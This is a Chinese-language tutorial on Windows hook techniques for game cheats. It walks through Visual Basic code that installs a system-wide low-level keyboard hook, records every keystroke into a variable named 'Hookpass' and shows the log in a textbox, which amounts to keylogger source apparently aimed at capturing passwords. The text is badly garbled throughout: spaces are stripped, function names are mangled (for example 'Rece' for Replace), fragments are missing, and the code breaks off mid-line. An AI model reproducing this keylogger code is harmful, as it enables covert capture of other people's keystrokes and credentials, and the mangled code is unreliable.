外掛之hook技術(shù)的最詳細(xì)教程

vb之HOOK技術(shù)終極詳細(xì)解HOOK代碼都跟這段代碼幾乎一個(gè)出處。網(wǎng)上有關(guān)于這些代碼hookwindows有不同的消息隊(duì)列。對(duì)于鍵盤鉤子，是安裝在系統(tǒng)的消息隊(duì)列中。（ OptionExplicit‘強(qiáng)制性變量，不允許出現(xiàn)未的變量。呵呵，都懂PublicDeclareFunctionGetKeyStateLib"user32"(ByValnVirtKeyAsLong)AsInteger‘Getkeystateapinvirtkey就是某個(gè)鍵的虛擬vbkeycontrolvbkeyshift就可以作為參數(shù)。1601（CapsLockNumLock，ScrollLock存器中，最為1時(shí)是負(fù)數(shù)，為0時(shí)是正數(shù)。PublicDeclareFunctionSetWindowsHookExLib"user32"AliasSetWindowsHookExAByValIdhoookhook。 =-1;線程級(jí);截獲用戶與控件交互的消息 =0; 系統(tǒng)級(jí);記錄所有消息隊(duì)列從消息隊(duì)列送出的輸入消息,在消息從隊(duì)列中清除時(shí)發(fā)生;可用于宏記錄 = 系統(tǒng)級(jí);回放由WH_JOURNALRECORD記錄的消息 = 系統(tǒng)級(jí)或線程級(jí); =3; 系統(tǒng)級(jí)或線程級(jí);截獲從消息隊(duì)列送出的消息 =4; 系統(tǒng)級(jí)或線程級(jí);截獲發(fā)送到目標(biāo)窗口的消息,在SendMessage調(diào)用時(shí)發(fā)生 =5; 系統(tǒng)級(jí)或線程級(jí);截獲系統(tǒng)基本消息,譬如:窗口的創(chuàng)建、激 = 系統(tǒng)級(jí); 系統(tǒng)級(jí)或線程級(jí); =8; 系統(tǒng)級(jí)或線程級(jí);截獲非標(biāo)準(zhǔn)硬件(非鼠標(biāo)、鍵盤)的消息 =9; 系統(tǒng)級(jí)或線程級(jí);在其他鉤子調(diào)用前調(diào)用,用于調(diào)試鉤子WH_S=10;系統(tǒng)級(jí)或線程級(jí);截獲發(fā)向外殼應(yīng)用程序的消息 =11;系統(tǒng)級(jí)或線程級(jí);在程序前臺(tái)線程空閑時(shí)調(diào)用 =12;系統(tǒng)級(jí)或線程級(jí);截獲目標(biāo)窗口處理完畢的消息,在SendMessage調(diào)用后發(fā)生WH_KEYBOARD_LL=13;MSDN 定要進(jìn)行處理，這時(shí)就建立一個(gè)函數(shù)進(jìn)行處理。在調(diào)用的時(shí)候用addressof函數(shù)名稱來(lái)調(diào)PublicFunctionCallKeyHookProc(ByValcodeAsLong,ByValramAsLong,ByVallParamAsLong)AsLong用addressof調(diào)用，這個(gè)回調(diào)函數(shù)在被調(diào)用的時(shí)候系統(tǒng)就傳遞給了它參數(shù)，所以，就算它是CodeHookHook的不同而有不同組的可能值。網(wǎng)上都hook的狀態(tài)，比如我們的鍵盤鉤子，可能的code如下：HC_ACTION=0‘當(dāng)系統(tǒng)傳遞過(guò)來(lái)的code是此值時(shí)，表示信息要被處理。HC_GETNEXT=1 HC_NOREM=HC_NOREMOVEHC_NOREMOVE=ram：對(duì)于鍵盤鉤子來(lái)說(shuō)，它包含了不同鍵的狀態(tài)，比如WM_KEYUPsetwindowshookex的參數(shù)：Hmod：包含鉤子函數(shù)的模塊(EXEDLL)句柄;HInstance;如果是當(dāng)前線程這里可以是0app.hinstance。dwThreadId：代表執(zhí)行這個(gè)Hook的ThreadId，如果不設(shè)定是那個(gè)Thread來(lái)做，則傳0(所以一般來(lái)說(shuō)，RemoteHook0進(jìn)去)VB的LocalHookApp.ThreadId進(jìn)去。本0.PublicDeclareFunctionUnhookWindowsHookExLib"user32"(ByValhHookAsLong)AsPublicDeclareFunctionCallNextHookExLib"user32"(ByValhHookAsLong,ByValnCodeAsLong,ByValramAsLong,lParamAsAny)AsLong了，同上PublicDeclareFunctionGetKeyNameTextLib"user32"Alias"GetKeyNameTextA"(ByVallParamAsLong,ByVallpBufferAsString,ByValnSizeAsLong)AsLong參數(shù)；24251ShiftCtrl鍵的區(qū)別例如strLen=GetKeyNameText(lKey,strKeyName,250) 如果IKEY是Esc鍵的掃描碼，然后strkeyName的值是“Esc囗囗囗囗囗囗囗囗（一共247個(gè)囗，總共250字節(jié)，strlen是3，也就是ESC的字節(jié)數(shù)。所以，得到的鍵名需要處理才能實(shí)際使用。PublicDeclareSubCopyMemoryLib"kernel32"Alias"RtlMoveMemory"(lpvDestAsAny,ByVallpvSourceAsLong,ByValcbCopyAsLong)‘內(nèi)存地址中的數(shù)據(jù)到另一個(gè)地址，lpvdest是目標(biāo)地址，lpvsource是源地址（PublicConstWH_KEYBOARD=2PublicConstWH_KEYBOARD_LL=13PublicConstHC_ACTION=PublicConstHC_SYSMODALOFF=5PublicConstHC_SYSMODALON=4PublicConstWM_KEYDOWN=&H100PublicConstWM_KEYUP=&H101PublicConstWM_SYSKEYDOWN=&H104PublicConstWM_SYSKEYUP=&H105PublicTypeKEYMSGSvKeyAsLongsKeyAsLongFlagAsLongtimeAsLongEndPublicstrKeyNameAsString*255255PublickeyMsgAs‘指定一個(gè)KEYMSGSKeyMsgPublicbolCtrlAsBooleanPublicbolShiftAsPublicbolCapsLockAsPublicHookIDAsLongPublicRECAsBooleanPublicHookpassAsStringPublicFunctionCallKeyHookProc(ByValcodeAsLong,ByValramAsLong,ByVallParamAsLong)AsLongDimlKeyAsDimstrKeyNameAsString*255DimstrLenAsLongDimstrNowInformationAsDimstrInformationAs Ifcode=HC_ACTIONThen‘當(dāng)code等于HC_ACTION時(shí)，由于安裝的是鍵盤鉤子，CopyMemorykeyMsg,lParam,lparam4keyMsgSelectCaseram‘選擇ramCaseWM_SYSKEYDOWN,WM_KEYDOWN:‘如果ram的消息是按下鍵（IfGetKeyState(vbKeyControl)<0Thenctrl鍵被按下，如果鍵被按下，getkeystate的返回值-127或者-128，前面，鍵按下時(shí)GetkeyState返回值最15位是bolCtrlTrue‘表示ctrlEndIfGetKeyState(vbKeyShift0ThenbolShift=True‘解釋同上EndCaseWM_SYSKEYUP,WM_KEYUP:‘如果ram消息是鍵彈起（包括系統(tǒng)鍵IfGetKeyState(vbKeyControl)>=0Then‘ctrl鍵處于彈起狀態(tài)，GetKeyState1bolCtrlFalse‘表示ctrlEndIfGetKeyState(vbKeyShift0ThenbolShift=False‘同上EndIf(GetKeyState(vbKeyCapital)And1)<>0Then'如果大小寫切換鍵CapsLK鍵處于激活狀態(tài)

bolCapsLock=bolCapsLock ‘CapsLKEndlKey=keyMsg.sKeyAnd&HFF‘這句我也糾結(jié)了好久，因?yàn)槲胰サ?HFF結(jié)果絲毫沒(méi)影響。這句話是“與“操作，按位與后，100，000，111，但是看&HFF1keyMsg.Skey沒(méi)影響。所以我覺(jué)得多余了。lparam：（lparam）,我覺(jué)得我得到的是個(gè)地12，lparam的值都是，因?yàn)樗莑ong型數(shù)據(jù)，所以我們copymemory的的數(shù)據(jù)可能是該地址及該地址以后4個(gè)字節(jié)的值。 491(我在搜索掃描碼，我看1的掃描碼是0x0231，這顯然不對(duì)，這并不是這里的掃描碼，12沒(méi)錯(cuò)。，131072 ，前面，GetKeyNameText的參數(shù)lparam：一共32位位0到5=0；位16到23=按鍵的掃描碼我們這里從第零位開始數(shù)，16到17位是10，于把2的所有位向左移16位（例如要左移10位，就乘以2的十次方。

strNowInformation=Left(strKeyName,strInformation=Rece(strNowInformation,"Num", ce“““， （strInformation=Rece(strInformation,"Del",".")strInformation=Rece(strInformation,"Ctrl","")strInformation=Rece(strInformation,"Shift","")strInformation=Rece(strInformation,"Alt","")strInformation=Rece(strInformation,"Tab","")strInformation=Rece(strInformation,"Right","")strInformation=Rece(strInformation,"Left","")strInformation=Rece(strInformation,"CapsLock","")strInformation=Rece(strInformation,"capslock","")strInformation=Rece(strInformation,"Backspace","|")strInformation=Rece(strInformation,"backspace","|")strInformation=Rece(strInformation,"Space","")strInformation=Rece(strInformation,"space","")strInformation=Rece(strInformation,"","")IfbolCtrl=FalseIfbolShift=FalseAndbolCapsLock=FalseThenHookpass=Hookpass&LCase(strInformation)EndIfbolShift=FalseAndbolCapsLock=TrueThenHookpass=Hookpass&strInformationEndIfbolShift=TrueSelectCasestrInformationCase"`"Hookpass=Hookpass&"~"Case"1"Hookpass=Hookpass&"!"Case"2"Hookpass=Hookpass&"@"Case"3"Hookpass=Hookpass&"#"Case"4"Hookpass=Hookpass&"$"Case"5"Hookpass=Hookpass&"%"Case"6"Hookpass=Hookpass&"^"Case"7"Hookpass=Hookpass&"&"Case"8"Hookpass=Hookpass&"*"Case"9"Hookpass=Hookpass&"("Case"0"Hookpass=Hookpass&")"Case"-"Hookpass=Hookpass&"_"Case"="Hookpass=Hookpass&"+"Case"["Hookpass=Hookpass&"{"Case"]"Hookpass=Hookpass&"}"Case";"Hookpass=Hookpass&":"Case"'"Hookpass=Hookpass&"'"Case"\"Hookpass=Hookpass&"|"Case","Hookpass=Hookpass&"<"Case"."Hookpass=Hookpass&">"Case"/"Hookpass=Hookpass&‘當(dāng)shiftCaseIfbolCapsLock=FalseHookpass=Hookpass&Hookpass=Hookpass&EndIfEndSelectEndIfEndIfEndSelectEndIfIfcode0 CallKeyHookProc=CallNextHookEx(0,code,ram,lParam)EndIfEndOptionPrivateSub App.hInstance,&O0)‘建立鍵盤鉤子EndPrivateSubForm_Unload(CancelAsInteger)UnhookWindowsHookExHookID’卸載鍵盤鉤子EndPrivateSubTimer1_Timer()Text1.TextHookpass‘記錄鍵盤EndSubTEXTText1，來(lái)記錄鍵盤。OptionPublicDeclareFunctionGetKeyStateLib"user32"(ByValnVirtKeyAsLong)AsPublicDeclareFunctionSetWindowsHookExLib"user32"Alias"SetWindowsHookExA"(ByValPublicDeclareFunctionUnhookWindowsHookExLib"user32"(ByValhHookAsLong)AsLongPublicDeclareFunctionCallNextHookExLib"user32"(ByValhHookAsLong,ByValnCodeAsLong,ByValramAsLong,lParamAsAny)AsLongPublicDeclareFunctionGetKeyNameTextLib"user32"Alias"GetKeyNameTextA"(ByVallParamAsLong,ByVallpBufferAsString,ByValnSizeAsLong)AsLonglpvSourceAsLong,ByValcbCopyAsLong)PublicConstWH_KEYBOARD=2PublicConstWH_KEYBOARD_LL=13PublicConstHC_ACTION=PublicConstHC_SYSMODALOFF=5PublicConstHC_SYSMODALON=4PublicConstWM_KEYDOWN=&H100PublicConstWM_KEYUP=&H101PublicConstWM_SYSKEYDOWN=&H104PublicConstWM_SYSKEYUP=&H105PublicTypeKEYMSGSvKeyAsLongsKeyAsLongFlagAsLongtimeAsLongEndPublicstrKeyNameAsString*255PublickeyMsgAsKEYMSGSPublicbolCtrlAsBooleanPublicbolShiftAsBooleanPublicbolCapsLockAsBooleanPublicHookIDAsLongPublicRECAsBooleanPublicHookpassAsStringPublicaAsLongPublicbAsLongPubliccAsLongPublicdAsLongPubliceAsLongPublicfAsLongPublicgAsLongPublichAsPublicFunctionCallKeyHookProc(ByValcodeAsLong,ByValramAsLong,ByVallParamAsLong)AsLongDimlKeyAsDimstrKeyNameAsString*255DimstrLenAsLongDimstrNowInformationAsStringDimstrInformationAsStringIfcode=HC_ACTIONCopyMemorykeyMsg,lParam,a=b=c=d=e=keyMsg.timeSelectCaseramIfGetKeyState(vbKeyControl)<0ThenbolCtrl=TrueEndIfGetKeyState(vbKeyShift)<0ThenbolShift=TrueEndIfGetKeyState(vbKeyControl)>=0ThenbolCtrl=FalseEndIfGetKeyState(vbKeyShift)>=0ThenbolShift=FalseEndIf(GetKeyState(vbKeyCapital)And1)<>0ThenbolCapsLock=TruebolCapsLock=EndlKey=keyMsg.sKeyAnd&HFFf=lKeylKey=lKey*65536g=lKeystrLen=GetKeyNameText(lKey,strKeyName,250)strNowInformation=Left(strKeyName,strLen)strInformation=Rece(strNowInformation,"Num","")strInformation=Rece(strInformation,"Del",".")strInformation=Rece(strInformation,"Ctrl","")strInformation=Rece(strInformation,"Shift","")strInformation=Rece(strInformation,"Alt","")strInformation=Rece(strInformation,"Tab","")strInformation=Rece(strInformation,"Right","")strInformation=Rece(strInformation,"Left","")strInformation=Rece(strInformation,"CapsLock","")strInformation=Rece(strInformation,"capslock","")strInformation=Rece(strInformation,"Backspace","|")strInformation=Rece(strInformation,"backspace","|")strInformation=Rece(strInformation,"Space","")strInformation=Rece(strInformation,"space","")strInformation=Rece(strInformation,"","")IfbolCtrl=FalseIfbolShift=FalseAndbolCapsLock=FalseThenHookpass=Hookpass&LCase(strInformation)EndIfbolShift=FalseAndbolCapsLock=TrueThenHookpass=Hookpass&strInformationEndIfbolShift=TrueSelectCasestr